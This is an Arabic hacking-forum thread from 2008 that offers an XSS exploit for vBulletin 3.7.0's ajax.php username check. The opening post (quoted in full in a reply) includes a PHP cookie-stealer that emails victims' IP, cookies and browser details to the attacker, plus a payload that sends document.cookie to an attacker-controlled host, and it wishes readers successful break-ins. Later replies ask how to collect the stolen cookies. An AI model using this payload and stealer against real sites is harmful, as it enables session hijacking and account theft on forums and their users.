ثغرة خطير في vBulletin 3.7.0

d4rK-h4ck3r · 11-09-2008, 01:04 AM

السلام عليكم

بدون مقدمآت

الثغرة في ملف ajax.php

vBulletin 3.7.0 <= XSS Explot
ثغرة التسجيل بواسطة الآجاكس هي عبارة عن ثغرة في التسجيل اثناء التحقق من المعلومات اثناء كتابتها بالكيبورد هناك مواثع تستخدم طريقة هذه في التسجيل وهذه ثغرة في النسخة 3.7.0

ajaxReg:
ajaxReg - Ajax Registration, with instant field checking - vBulletin.org Forum
الثغرة :

كود PHP:

   
http://[website]/[forumpath]/ajax.php?do=CheckUsername&param=# EVIL XSS SCRIPT #

http://www.site.com/forums/ajax.php?do=CheckUsername&param=***************('xss');</script>

آعمل ملف جديد

كود PHP:

 
File.php

<?

 
$ Ip = $ _SERVER [ ’REMOTE_ADDR’];

$ UserAgent = $ _SERVER [ ’HTTP_USER_AGENT’];

$Accept $ = $ _SERVER [ ’HTTP_ACCEPT_LANGUAGE’];

$Co okie = $ _GET [ ’c’];

$Myemail = "YOUR E-MAIL;

$Date = today ( "l, j F, Y, g: ia");

$Subject = "Xss th30nR";

$Message = "Th30nuR () 2006

Ip: $ ip

Coo kies: $ coo kies

Browser: $ userAgent

Language: $ accept

URL: Basic $

Day & Time: $ today \\\\ n";

$ From = "From: $ myemail \\\\ r \\\\ n";

Mail ($ myemail, $ subject, $ message, $ from);

?>

تطبيق:

كود PHP:

  www.vb.com/vb/ajax.php?do=CheckUsername&param=********** ********.location.replace ( ’http://WWW.ursite.com/FILE.php?c =’ + ********.co okie); </ script

مع انك تشيل الفراغات اللي في coo kie
وإختراقات موفقة
وهذا برنامج للاخ Sn!pEr-Dz برنامج لاضهار ملفات اي الموقع مميز جدا وخطير جدا يطلعلك عديد ملفات الموقع مثل ajax.php
والي ناوي يخترق منتدانا اقول هذي النسخة 3.8.1 يعني شوف نعجة العب معاها:d
اخوكم dark hacker اهداء لPassword & inconnu

المصدر: :: vBspiders Professional Network ::

eyvm o'dv td vBulletin 3>7>0

PASSEWORD · 11-09-2008, 01:14 AM

اقتباس

المشاركة الأصلية كتبت بواسطة Da®k H@©K3R


	السلام عليكم بدون مقدمآت الثغرة في ملف ajax.php vBulletin 3.7.0 <= XSS Explot ثغرة التسجيل بواسطة الآجاكس هي عبارة عن ثغرة في التسجيل اثناء التحقق من المعلومات اثناء كتابتها بالكيبورد هناك مواثع تستخدم طريقة هذه في التسجيل وهذه ثغرة في النسخة 3.7.0 ajaxReg: ajaxReg - Ajax Registration, with instant field checking - vBulletin.org Forum الثغرة : كود PHP: `http://[website]/[forumpath]/ajax.php?do=CheckUsername&param=# EVIL XSS SCRIPT # http://www.site.com/forums/ajax.php?do=CheckUsername&param=*************('xss');</script>` آعمل ملف جديد كود PHP: File.php <? $ Ip = $ _SERVER [ ’REMOTE_ADDR’]; $ UserAgent = $ _SERVER [ ’HTTP_USER_AGENT’]; $Accept $ = $ _SERVER [ ’HTTP_ACCEPT_LANGUAGE’]; $Co okie = $ _GET [ ’c’]; $Myemail = "YOUR E-MAIL; $Date = today ( "l, j F, Y, g: ia"); $Subject = "Xss th30nR"; $Message = "Th30nuR () 2006 Ip: $ ip Coo kies: $ coo kies Browser: $ userAgent Language: $ accept URL: Basic $ Day & Time: $ today \\\\ n"; $ From = "From: $ myemail \\\\ r \\\\ n"; Mail ($ myemail, $ subject, $ message, $ from); ?> تطبيق: كود PHP: `www.vb.com/vb/ajax.php?do=CheckUsername&param=****** ****.location.replace ( ’http://WWW.ursite.com/FILE.php?c =’ + ******.co okie); </ script> مع انك تشيل الفراغات اللي في coo kie` وإختراقات موفقة وهذا برنامج للاخ Sn!pEr-Dz برنامج لاضهار ملفات اي الموقع مميز جدا وخطير جدا يطلعلك عديد ملفات الموقع مثل ajax.php والي ناوي يخترق منتدانا اقول هذي النسخة 3.8.1 يعني شوف نعجة العب معاها:d اخوكم dark hacker اهداء لPassword & inconnu

دائما مبدع كالعادة
شكرا على الاهداء

ZHech · 11-09-2008, 02:03 AM

شكراشكرا

d4rK-h4ck3r · 11-09-2008, 02:50 PM

مشكور على مرورك يا الغالين ننتظروا جديدكم

The Final Doom · 11-10-2008, 04:46 PM

تسلـــم يا باشا على الثغرة

كنكشن · 11-10-2008, 10:53 PM

اخوي عندي كم سؤال

س1: طيب ممكن توضح اكثر اين يخزن الكوكز او الباسورد هل يرسل على الايميل اما ماذا وين احط الايميل او ملف txt عشان تتخزن فيه معلومات الكوكز

س2: الملف هذا هل يمكن ان استخدمه في اي ثغر xss بعض ثغرة الميل روم يحط كود الثغره بعدين قوسين ويكتب xss يعني احط الملف هذا يصلح طبعا بعد رفعه على موقعي الخاص

رجاء الرد انا بحاجه للاجوبه.............................

d4rK-h4ck3r · 11-10-2008, 10:58 PM

مشكورين على المرور و بالنسبة للاخ كنكشن ساعمل موضوع عما قريب لجميع اسئلتك لكن اصبر علي شوي لان المدة هذي امتحانات ادعولي شباب

hacker_dz · 11-11-2008, 08:58 PM

شكراشكرا

Dr-j0k · 11-12-2008, 09:10 PM

مشكوووور خويا العزيز والله مبدعبطل

كنكشن · 11-16-2008, 10:46 PM

PROF · 11-21-2008, 11:04 AM

شكرا اخي علي الثغرة

Hacking ghost · 11-21-2008, 12:04 PM

مشكوور على الثغرة طخطخطخ

العربي الصغير · 11-24-2008, 02:01 AM

تسلم يدك اخي شكراً جزيلاً لك

EXE · 11-27-2008, 04:15 AM

العب مع التونسين و مت كالباقين

.: Dr.SmOoK :. · 11-27-2008, 04:43 AM

يعطيك العافيه

لكن النسخه هذي قديمه

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
ثغرة أمنية خطيرة في vBulletin v3.8.6	DannY.IraQi	قســم تطويــر المــــواقع	1	07-25-2010 06:16 PM
ثغرة XSS في النسخة vbulletin 4.0.2	xman2	قســم تطويــر المــــواقع	1	05-08-2010 01:22 AM
هل يوجد ثغرة vBulletin 3.8.3	hacks	قســم إختــراق الأجهــزة	3	10-16-2009 07:45 PM
[ خبـر ] : وجود ثغرة vBulletin 3.8.4 PL1 XSS	xman2	قســم تطويــر المــــواقع	0	10-08-2009 09:42 PM
خطير ثغرة تصيب كل المنتديات	xman2	قســم تطويــر المــــواقع	0	05-27-2009 01:31 AM

ثغرة خطير في vBulletin 3.7.0

قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات